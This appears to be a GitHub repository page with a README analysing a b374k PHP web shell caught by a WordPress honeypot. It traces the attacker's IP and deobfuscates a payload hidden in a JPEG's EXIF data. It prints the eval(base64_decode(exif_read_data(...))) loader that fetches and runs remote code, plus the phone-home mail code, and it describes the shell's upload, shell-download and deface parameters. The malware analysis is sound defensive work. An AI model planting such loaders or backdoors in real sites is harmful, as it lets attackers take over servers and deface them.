Skip to content

Latest commit

 

History

History

b374k

Folders and files

NameName
Last commit message
Last commit date

parent directory

..

120.188.36.204Wp87em3egJVqXVtNsWGuDwAAAAs.0.file

120.188.36.204Wp87em3egJVqXVtNsWGuDwAAAAs.0.file

 
 

120.188.36.204Wp87em3egJVqXVtNsWGuDwAAAAs.upload-plugin.scans

120.188.36.204Wp87em3egJVqXVtNsWGuDwAAAAs.upload-plugin.scans

 
 

120.188.36.204Wp87fm3egJVqXVtNsWGuEAAAAAs.load-scripts.scans

120.188.36.204Wp87fm3egJVqXVtNsWGuEAAAAAs.load-scripts.scans

 
 

2.8

2.8

 
 

3.2.3

3.2.3

 
 

README.md

README.md

 
 

b374k-2.8-deobfuscated.php

b374k-2.8-deobfuscated.php

 
 

bh.txt

bh.txt

 
 

exif_data

exif_data

 
 

exif_reader

exif_reader

 
 

pacman.jpg

pacman.jpg

 
 

themes.php

themes.php

 
 

uc2.php

uc2.php

 
 

uc3.php

uc3.php

 
 

uc4.php

uc4.php

 
 

usercomment.out

usercomment.out

 
 

usercomment.php

usercomment.php

 
 

wget_bh.txt

wget_bh.txt

 
 

zeroshell.php

zeroshell.php

 
 

README.md

Crouching JPEG, Hidden PH2

b374k shell 3.2.3 - 2018-03-02

An instance of b374k web shell, with a strange code retrieval from EXIF data in a JPG image from googleusercontent.com

Is this the original b374k shell?

Another analysis of this particular piece of malware.

Origin

Download

Downloaded as a plain file ("application/octet-stream") named b374k_3.2.3.php using the "Upload" tab of WordPress' plugin installer. Bad luck, this was part of a WordPress honey pot, so no plugins got installed.

IP Address 120.188.36.204

120.188.36.204 has domain name 120-188-36-204.resources.indosat.com

120-188-36-204.resources.indosat.com has no DNS name.

inetnum:        120.188.36.0 - 120.188.36.255
netname:        GGSN-3G-ISAT-ID
descr:          GGSN 3G
descr:          INDOSAT's 3g Broadband Customer
descr:          Jakarta
country:        ID
admin-c:        IH151-AP
tech-c:         IH151-AP
remarks:        For abuse and spam report please contact abuse@indosat.com
status:         ALLOCATED NON-PORTABLE
mnt-by:         MAINT-ID-INDOSAT-INP
last-modified:  2009-06-10T02:12:04Z
source:         APNIC

person:         INDOSAT INP Hostmaster
nic-hdl:        IH151-AP
e-mail:         hostmaster@indosatooredoo.com
address:        PT Indosat
address:        Jl. Medan Merdeka Barat 21
address:        Jakarta Pusat
phone:          +62-21-30072088
                +62-8557897897
fax-no:         +62-21-30001073
country:        ID
mnt-by:         MAINT-ID-INDOSAT-INP
last-modified:  2015-11-30T04:59:02Z
source:         APNIC

traceroute to 120.188.36.204 (120.188.36.204), 30 hops max, 60 byte packets
 1  129-45-246-162.versonetworks.net (162.246.45.129)  28.207 ms  28.412 ms  28.374 ms
 2  10.100.100.1 (10.100.100.1)  28.382 ms  28.351 ms  28.318 ms
 3  v231.core1.den1.he.net (216.66.73.25)  28.320 ms  28.288 ms  28.274 ms
 4  100ge3-2.core1.sjc2.he.net (184.105.64.69)  62.876 ms  62.874 ms  62.841 ms
 5  10ge4-5.core1.pao1.he.net (72.52.92.69)  62.829 ms 100ge1-1.core1.pao1.he.net (72.52.92.158)  62.817 ms  62.799 ms
 6  eqix-sv8-ptindosat.com (198.32.176.167)  62.762 ms  64.298 ms  49.137 ms
 7  114-0-78-103.resources.indosat.com (114.0.78.103)  214.498 ms  214.476 ms  214.407 ms
 8  114-0-78-37.resources.indosat.com (114.0.78.37)  214.435 ms  214.416 ms  214.371 ms
 9  114-0-78-205.resources.indosat.com (114.0.78.205)  224.314 ms  224.299 ms  224.264 ms
10  114-4-19-102.resources.indosat.com (114.4.19.102)  224.222 ms  224.167 ms  224.158 ms
11  * * *
12  114-0-51-24.resources.indosat.com (114.0.51.24)  230.087 ms  232.118 ms  232.067 ms
13  * * *
	..l
30  * * *

Decoding/Deobfuscating/Tracking down files

Downloaded file b374k_3.2.3.php is not obfuscated in any form. It's just PHP source.

It does have code that should make any reader suspcious:

$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));

PHP program exif_reader retrieves that URL: php exif_reader > exif_data I did also download the JPG file from which that data derives. It's right here:

Crouching JPG, Hidden PHP

The UserComment element of the EXIF data does have a 2800 byte string in it. Invoking php usercomment.php > usercomment.out lets us see what that string has encoded, which is a small decoder.

Invoking php uc2.php > uc3.php gives us another layer of obfuscationl Invoking php uc3.php > uc4.php gives us what's probably the original PHP code.

Analysis

The PHP code in pacman.jpg appears to execute every time b374k.php get accessed. The first time this hidden PHP code executes it does a phone-home:

$to = "syedich@yahoo.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <jancok@matamucok.com>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);

Creation of a file named .db allows the hidden code to not phone home more than once.

The hidden code appears to be a small, crude web shell that only does things if certain HTTP GET parameters are set. The hidden code can upload a file to the infected Wordpess site if "0upload" is set. The hidden code can download two files: https://sites.google.com/site/bhshll123/bh.txt if HTTP GET parameter "0shell" is set, and http://pastebin.com/raw/6JA72K8m if HTTP GET parameter "0deface" is set. Those parameter names suggest mischief! I also think the hidden code will execute before the b374k code does. You have to know about the hidden code - it's a layer of obscurity on top of the covert b374k shell download.

bh.txt contains some CSS and HTML that look like legitmate Google code. I'm not sure what's going on with it: it's totally convoluted, and I'm not a JavaScipt expert.

The pastebin URL gives me a 404 - not found.

The domain name "matamucok.com" does not appear in DNS or in whois information. As a "from" address I suppose lack of an IP address doesn't matter. "jancok@matamucok.com" doesn't show up in google as such, but apparently that's an Indonesian name. "syedich@yahoo.com" does appear in google, mostly in people mad about this particular web shell.